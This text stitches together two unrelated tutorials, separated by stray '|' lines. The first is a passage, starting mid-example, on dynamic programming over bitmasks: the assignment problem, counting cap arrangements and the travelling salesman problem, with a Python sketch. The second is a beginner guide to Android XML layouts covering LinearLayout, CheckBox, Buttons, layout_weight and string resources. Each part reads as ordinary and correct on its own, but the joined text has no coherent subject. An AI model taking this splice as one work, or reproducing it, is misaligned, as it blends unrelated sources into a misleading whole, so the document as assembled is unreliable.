- Unset the $$1^{st}$$ bit: let $$i = 1$$, so $$\sim(1 \lt\lt i) = 11101$$ and $$01010 \ \& \ 11101 = 01000$$. Now the subset no longer includes the value 2, so the subset is $$\{4\}$$.

The first thing to make sure of before using bitmasks to solve a problem is that its constraints are small, as solutions that use bitmasking generally take exponential time and memory.

Usually the state of a DP can be represented with a few variables, such as dp[i], dp[i][j] or dp[i][j][k]. Sometimes, however, the state of a DP problem contains many boolean statuses. In this case we can use state compression: each status is encoded as a single bit, so the whole state can be encoded as a group of bits, i.e. a mask. Our main methodology is to assign a value to each mask (and, therefore, to each subset) and to calculate the values for new masks using the values of already-computed masks. When the value for a mask $$X$$ is computed from submasks $$X'_1, \ldots, X'_k$$, the values for the $$X'_i$$ must have been computed already, so we need to establish an ordering in which masks will be considered. It is easy to see that the natural ordering will do: go over masks in increasing order of the corresponding numbers, since setting an extra bit always produces a larger number.

Assignment problem. There are $$N$$ persons and $$N$$ tasks; each task is to be allotted to a single person, and each person will be allotted exactly one task. We are also given a matrix $$cost$$ of size $$N \times N$$, where $$cost[i][j]$$ denotes how much person $$i$$ is going to charge for task $$j$$. We need to assign each task to a person in such a way that the total cost is minimum. A simple solution is to try all possible assignments, but there are $$N!$$ of them; with DP over bitmasks there are only $$2^N$$ states. While still intractable for large $$N$$, the runtime is significantly better:

| $$N$$ | $$2^N$$ | $$N!$$ |
| --- | --- | --- |
| 1 | 2 | 1 |
| 10 | 1,024 | 3,628,800 |
| 20 | 1,048,576 | 2,432,902,008,176,640,000 |

Suppose the state of the dp is $$(k, mask)$$, where $$k$$ represents that persons $$0$$ to $$k-1$$ have been assigned a task, and $$mask$$ is a binary number whose $$i^{th}$$ bit represents whether the $$i^{th}$$ task has been assigned or not. Given $$answer(k, mask)$$, we can assign task $$i$$ to person $$k$$ iff the $$i^{th}$$ task is not yet assigned to any person, i.e. $$mask \ \& \ (1 \lt\lt i) = 0$$, which leads to the state $$(k+1, mask \mid (1 \lt\lt i))$$. But $$k$$ is redundant: the number of persons assigned always equals the number of tasks assigned, so $$k$$ equals the number of set bits in $$mask$$. The dp state is therefore just $$(mask)$$, and if we have $$answer(mask)$$, then

$$answer(mask \mid (1 \lt\lt i)) = \min(answer(mask \mid (1 \lt\lt i)),\ answer(mask) + cost[x][i])$$

where $$x =$$ number of set bits in $$mask$$. The final answer is $$answer(2^N - 1)$$.

Counting problems can be handled the same way. Bitmasking and DP is, for instance, the method used for questions like assigning unique caps among persons: there are $$n$$ persons (up to 10) and 100 different types of caps, each having a unique id from 1 to 100, and each person owns a collection of caps. Count the total number of arrangements such that none of them is wearing the same type of cap; since the number of ways could be large, output it modulo 1000000007. The idea is to use the fact that there are up to 10 persons, so an integer variable can serve as a bitmask storing which persons are already wearing a cap. A table dp[][] is used such that in every entry dp[i][j], i is the mask and j is the cap number. Since we want to access all persons that can wear a given cap, we use an array of vectors, capList[101]; the value capList[i] indicates the list of persons that can wear cap i. The Codechef problem "Little Elephant and T-Shirts", where Little Elephant and his friends are going to a party, there are 100 different kinds of T-shirts, and each person has his own collection, is solved in the same way. Another classical application is the travelling salesman problem, performing the shortest-path algorithm with the help of bitmasking and dynamic programming over the state (current position, mask of visited positions). In general, you can do a bitmask DP whenever you feel "to solve a subproblem, I need the previously visited positions/indices".
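A minimal Python sketch of the mask-only assignment DP described above (the function name and the example matrix are mine, not from the original article):

```python
from math import inf

def min_assignment_cost(cost):
    # cost[i][j] = price person i charges for task j (an N x N matrix).
    n = len(cost)
    dp = [inf] * (1 << n)  # dp[mask] = min cost of assigning the tasks in
    dp[0] = 0              # mask to the first popcount(mask) persons
    for mask in range(1 << n):
        if dp[mask] == inf:
            continue
        x = bin(mask).count("1")      # person x receives the next task
        for i in range(n):
            if not mask & (1 << i):   # task i is still unassigned
                nxt = mask | (1 << i)
                dp[nxt] = min(dp[nxt], dp[mask] + cost[x][i])
    return dp[(1 << n) - 1]

# The optimal assignment here is person 0 -> task 1, person 1 -> task 0,
# person 2 -> task 2, for a total cost of 2 + 6 + 1 = 9.
print(min_assignment_cost([[9, 2, 7], [6, 4, 3], [5, 8, 1]]))
```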
|
|
# Getting Started with XML Layouts
This tutorial will teach you the fundamentals of building Android interface layouts with XML. Read on!
When you’re getting started with developing Android apps using Eclipse and the ADT plugin, Eclipse’s powerful graphical layout editor is a great place to start visually designing your user interface. However, this "what you see is what you get" approach has its limitations, and at some point you'll need to switch to XML.
One of the major benefits of declaring your UI in XML is the ability to keep the UI and the behavior of your app separate, giving you the freedom to tweak your app’s presentation without disrupting its underlying functionality.
In this article, I’ll show you how to design a basic XML layout from scratch, including defining the root element, specifying height and width parameters, and adding some basic UI elements. Finally, I’ll use this basic layout to demonstrate some advanced XML options, such as allocating different amounts of space to different objects, and getting started with string resources.
Note: In Android, XML layouts should be stored in the res/layout directory with the .xml extension.
## Part 1: XML Layout Basics
First, we’ll get used to XML by creating a very basic Android UI that uses the LinearLayout view group to hold a checkbox element. Open the res/layout/activity_main.xml file and let’s get started.
## Step 1: Specify Your Root Element
The UI must contain a single root element that acts as a visual container for all your other items. The root element can be a ViewGroup (e.g., LinearLayout, ListView, or GridView), a merge element, or a View, but it must declare the XML namespace. In this example, I’ll be using LinearLayout, a ViewGroup that aligns all children in a specified direction.
A LinearLayout consists of opening and closing XML tags:
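```xml
<LinearLayout>
</LinearLayout>
```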
In the opening tag, you’ll need to define the XML namespace, which is a standard recommended by the W3C. Defining the XML namespace in Android is easy: simply enter the following attribute and URL as part of the opening LinearLayout tag:
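```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android">
</LinearLayout>
```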
## Step 2: Width and Height
Next, specify the width and height parameters for your root element. In most instances, you’ll use the "fill_parent" value for the root element, as this instructs it to take up the device’s entire screen.
Enter the following XML for the height/width parameters:
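```xml
android:layout_width="fill_parent"
android:layout_height="fill_parent"
```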
Your XML should now look like this:
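```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">
</LinearLayout>
```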
## Step 3: Creating a Checkbox
It’s time to add something to that blank canvas! Enter the opening tag for your checkbox. Because this is a UI element, some additional XML is required:
1) ID: Android uses an integer ID to identify each UI element within the view tree. In XML, the ID is referenced as a string, using the 'id' attribute and the following syntax:
android:id="@+id/name"
In this example, we’ll refer to this UI element as 'CheckBox:'
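```xml
android:id="@+id/CheckBox"
```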
2) Width/Height Parameters: wrap_content
Once again, you’ll need to enter the height/width parameters. Setting this attribute to ‘wrap_content’ will make the corresponding item just large enough to enclose its content. We can re-use the height/width syntax structure from earlier, replacing ‘fill_parent’ with ‘wrap_content’:
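```xml
android:layout_width="wrap_content"
android:layout_height="wrap_content"
```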
3) Text: Finally, you’ll need to specify the text that should appear alongside the checkbox. We’ll set the checkbox to display 'Yes':
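```xml
android:text="Yes" />
```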
Your XML should now look like this:
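```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">

    <CheckBox
        android:id="@+id/CheckBox"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="Yes" />

</LinearLayout>
```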
Run your code in the Android Emulator to see your XML in action!
## Part 2: Create Your Second UI with XML
In the second part of this tutorial, we’ll look at some more advanced XML for fine-tuning your UI. We’ll create a layout consisting of two buttons, and then use the 'weight' attribute to change the percentage of layout space allocated to each before briefly covering the basics of string resources.
## Step 1: Create Your Layout
The first step is to create the barebones of your layout. We’ll re-use the LinearLayout root element from the previous example, along with the width/height parameters and, of course, the XML namespace:
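```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">
</LinearLayout>
```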
## Step 2: Create Your Buttons
To create the first button, add the 'Button' opening tag, and the integer ID using the element name 'button1.'
Set the width and height attributes to "wrap_content." We’ll be creating a 'Yes' and a 'No' button, so specify 'Yes' as the accompanying text:
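```xml
<Button
    android:id="@+id/button1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:text="Yes"
```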
Finally, close button1:
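```xml
/>
```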
Now you have the code for one button, you can easily create another by making a few adjustments:
1) Change the ID to 'button2'
2) Specify that the text should be 'No' (android:text="No")
Your XML should now look like this:
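```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">

    <Button
        android:id="@+id/button1"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="Yes" />

    <Button
        android:id="@+id/button2"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="No" />

</LinearLayout>
```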
## Step 3: Check the Emulator
To preview how this will look on a real-life Android device, boot up the emulator and take a peek!
## Part 3: Advanced XML Options
Now you have your basic UI, we’ll use some more advanced XML to refine this simple layout.
Set Layout_Weight
The 'android:layout_weight' attribute allows you to specify the size ratio between multiple UI elements. Put simply, the higher the weight value, the greater the proportion of leftover space allocated, and the more the UI element expands. If you don’t specify a weight, Android assumes a weight of zero for every item and distributes no extra space to it. The space ratio can be set with the following XML:
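```xml
android:layout_weight="1"
```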
In this example, we will assign ‘button1’ with a value of 1, and ‘button2’ with a value of 2.
Note, this is purely an addition; you do not need to change any of the existing code.
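```xml
<Button
    android:id="@+id/button1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_weight="1"
    android:text="Yes" />

<Button
    android:id="@+id/button2"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_weight="2"
    android:text="No" />
```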
The above XML will create two buttons of different sizes:
An Intro to String Resources
A string resource provides text strings for your application and resource files. In most instances, it’s good practice to store all your strings in the dedicated ‘strings.xml’ file, which can be found by:
1) Opening the ‘Res’ folder in Eclipse’s project explorer.
2) Opening the ‘Values’ folder.
3) Opening the ‘strings.xml’ file.
To create a new string in your Android project:
1) Open the ‘strings.xml’ file and select ‘Add.’
2) Select ‘String’ from the list and click ‘Ok.’
3) In the right-hand ‘Attributes for string’ menu, enter a name for the string, and a value. (Note: the ‘name’ attribute is used to reference the string value, and the string value is the data that will be displayed.)
In this example, we will give the string the name ‘agree’ and enter the value ‘I agree to the terms and conditions.’
4) Save this new string resource.
5) Open your ‘activity_main.xml’ file. Find the section of code that defines ‘button1’ and change the ‘android:text’ attribute to call this new string resource. Calling a string resource uses the following syntax:
android:text="@string/name-of-resource"
So, in this example, the code will be:
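```xml
android:text="@string/agree"
```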
For ease of viewing the output, delete ‘button2.’ Your code should now look like this:
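```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent">

    <Button
        android:id="@+id/button1"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_weight="1"
        android:text="@string/agree" />

</LinearLayout>
```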
Check the visual output of your code - the text should have been replaced with the value of your ‘agree’ string.
This is a very basic string, without any additional styling or formatting attributes. If you want to learn more about string resources, the official Android docs are a great source of further information.
## Conclusion
In this article, we’ve covered the XML essentials of creating a root element for your layout and coded a few basic UI elements, before moving onto some more advanced XML that gives you greater control over your UI. You should now be ready to create your own simple user interfaces using XML!
|